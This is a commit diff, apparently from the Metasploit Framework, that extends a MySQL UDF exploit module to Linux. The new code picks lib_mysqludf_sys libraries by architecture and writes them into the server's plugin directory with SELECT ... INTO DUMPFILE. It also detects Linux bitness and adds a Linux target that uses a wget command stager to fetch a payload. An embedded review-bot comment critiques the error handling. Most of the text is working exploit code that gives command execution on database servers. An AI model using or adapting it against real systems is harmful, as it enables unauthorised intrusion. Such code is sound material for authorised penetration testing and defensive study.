mysql UDF now multi

MS-2855/keylogger-mettle-extension
h00die 2017-11-03 05:26:05 -04:00
parent 60a7a80ff0
commit 697031eb36
5 changed files with 32 additions and 10 deletions

Binary file not shown.

Binary file not shown.


@ -0,0 +1 @@
on ubuntu, edit /lib/systemd/system/mysql.service


@ -144,21 +144,32 @@ module Exploit::Remote::MYSQL
binname = Rex::Text.rand_text_alpha(8) binname = Rex::Text.rand_text_alpha(8)
binpath = tmpdir << binname binpath = tmpdir << binname
print_status "Uploading binary as #{binpath}..." print_status "Uploading binary as #{binpath}..."
print_status "SELECT #{blob} into DUMPFILE '#{binpath}'"
res = mysql_query("SELECT #{blob} into DUMPFILE '#{binpath}'") res = mysql_query("SELECT #{blob} into DUMPFILE '#{binpath}'")
return res return res
end end
def mysql_upload_sys_udf(arch=:win32,target_path=nil) def mysql_upload_sys_udf(arch=:win32,target_path=nil)
fname = (arch == :win32 ? "lib_mysqludf_sys_32.dll" : "lib_mysqludf_sys_64.dll") case arch
when :win32
fname = 'lib_mysqludf_sys_32.dll'
when :win64
fname = 'lib_mysqludf_sys_64.dll'
when :linux32
fname = 'lib_mysqludf_sys_32.so'
when :linux64
fname = 'lib_mysqludf_sys_64.so'
end
sys_dll = File.join( Msf::Config.data_directory, "exploits", "mysql", fname ) sys_dll = File.join( Msf::Config.data_directory, "exploits", "mysql", fname )
data = File.open(sys_dll, "rb") {|f| f.read f.stat.size} data = File.open(sys_dll, "rb") {|f| f.read f.stat.size}
blob = "0x" blob = "0x"
blob << data.unpack("C*").map {|x| "%02x" % [x]}.join blob << data.unpack("C*").map {|x| "%02x" % [x]}.join
dll_name = Rex::Text.rand_text_alpha(8) dll_name = Rex::Text.rand_text_alpha(8)
target_dll = target_path << dll_name << ".dll" [:win32, :win64].include?(arch) ? extension = '.dll' : extension = '.so'
target_dll = target_path << dll_name << extension
print_status "Uploading #{fname} library to #{target_dll}..." print_status "Uploading #{fname} library to #{target_dll}..."
mysql_query("SELECT #{blob} into DUMPFILE '#{target_dll}'") mysql_query("SELECT #{blob} into DUMPFILE '#{target_dll}'")
return dll_name << ".dll" return dll_name << extension
end end
def mysql_drop_and_create_sys_exec(soname) def mysql_drop_and_create_sys_exec(soname)
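Review bot: The new `case arch` in mysql_upload_sys_udf has no `else`, so any value outside the four listed symbols (mysql_get_arch can return `:unknown` or the raw version string) leaves `fname` nil and `File.join` fails with a TypeError rather than a clear message; add `else raise ArgumentError, "unsupported MySQL arch: #{arch.inspect}"` before the `end` of the case. The extension selection reads more naturally as `extension = [:win32, :win64].include?(arch) ? '.dll' : '.so'` instead of assigning inside both ternary arms. The hunk's line counts suggest `print_status "SELECT #{blob} into DUMPFILE '#{binpath}'"` in mysql_upload_binary is on the new side; if so, it echoes the entire hex-encoded library to the console on every upload, so consider `vprint_status` or dropping it (that method starts before the hunk).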
@ -181,6 +192,15 @@ module Exploit::Remote::MYSQL
:win64 :win64
when /Win32/i when /Win32/i
:win32 :win32
when /Linux/i
# we need a second query to determine bits
res = mysql_get_variable("@@version_compile_machine")
return :unknown unless res
if res =~ /x86_64/i
:linux64
else
:linux32
end
else else
res res
end end
@ -189,7 +209,7 @@ module Exploit::Remote::MYSQL
def mysql_add_sys_exec def mysql_add_sys_exec
arch = mysql_get_arch arch = mysql_get_arch
case arch case arch
when :win64,:win32 when :win64,:win32,:linux64,:linux32
target_path = mysql_get_plugin_dir target_path = mysql_get_plugin_dir
if target_path if target_path
print_status "Target arch (#{arch}) and target path both okay." print_status "Target arch (#{arch}) and target path both okay."


@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
super( super(
update_info( update_info(
info, info,
'Name' => 'Oracle MySQL for Microsoft Windows Payload Execution', 'Name' => 'Oracle MySQL UDF Payload Execution',
'Description' => %q{ 'Description' => %q{
This module creates and enables a custom UDF (user defined function) on the This module creates and enables a custom UDF (user defined function) on the
target host via the SELECT ... into DUMPFILE method of binary injection. On target host via the SELECT ... into DUMPFILE method of binary injection. On
@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Author' => 'Author' =>
[ [
'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries 'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
'todb' # this Metasploit module 'todb', # this Metasploit module
'h00die' # linux addition
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
@ -35,12 +36,12 @@ class MetasploitModule < Msf::Exploit::Remote
# Bernardo's work with cmd exec via udf # Bernardo's work with cmd exec via udf
[ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ] [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ]
], ],
'Platform' => 'win', 'Platform' => ['win', 'linux'],
'Targets' => 'Targets' =>
[ [
[ 'Automatic', { } ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit) [ 'Windows', {'CmdStagerFlavor' => 'vbs'} ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
[ 'Linux', {'CmdStagerFlavor' => 'wget' } ]
], ],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post. 'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
)) ))
@ -83,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
if not m if not m
return return
elsif not [:win32,:win64].include?(@mysql_arch) elsif not [:win32,:win64,:linux64,:linux32].include?(@mysql_arch)
print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'") print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
return return
else else